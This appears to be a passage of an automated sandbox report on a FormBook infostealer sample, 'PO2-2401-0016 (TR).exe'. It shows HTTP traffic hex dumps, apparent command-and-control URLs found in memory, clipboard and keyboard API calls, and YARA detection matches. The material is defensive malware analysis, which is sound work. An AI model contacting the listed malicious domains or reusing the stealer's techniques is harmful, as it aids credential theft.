6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:32:53 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 16 Sep 2024 07:32:55 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:33:10 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:33:12 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:33:15 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 16 Sep 2024 07:33:17 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "6663edd0-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:33:23 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: WwOlfblnYaWmLq.exe, 00000006.00000002.4511569074.00000000053E6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.070001350.xyz
            Source: WwOlfblnYaWmLq.exe, 00000006.00000002.4511569074.00000000053E6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.070001350.xyz/ivyl/
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RMActivate_ssp.exe, 00000005.00000002.4510222204.0000000004342000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000003E12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_des
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006B0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RMActivate_ssp.exe, 00000005.00000002.4508610835.00000000006D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RMActivate_ssp.exe, 00000005.00000003.2511873644.0000000007544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RMActivate_ssp.exe, 00000005.00000002.4510222204.0000000004CAE000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.000000000477E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.capbear.net/ijno/?bX=Dl/71iUE13/iiXwoBfJjBLiuXn/LC2nGhOcLBPqUgcWlG3I9myODuvD/dy
            Source: WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000004910000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.drupal.org)
            Source: RMActivate_ssp.exe, 00000005.00000002.4512046151.000000000756E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RMActivate_ssp.exe, 00000005.00000002.4510222204.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, WwOlfblnYaWmLq.exe, 00000006.00000002.4509717611.0000000003C80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mfgamecompany.shop/lwt6/?bX=j/d5AuZ
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001CEAFF
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001CED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_001CED6A
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001CEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_001CEAFF
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001BAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_001BAA57
            Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exeCode function: 0_2_001E9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_001E9576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: PO2-2401-0016 (TR).exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO2-2401-0016 (TR).exe, 00000000.00000000.2048420548.0000000000212000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fda320f3-6
            Source: PO2-2401-0016 (TR).exe, 00000000.00000000.2048420548.0000000000212000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_20fd1ad0-4
            Source: PO2-2401-0016 (TR).exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8360d80b-3
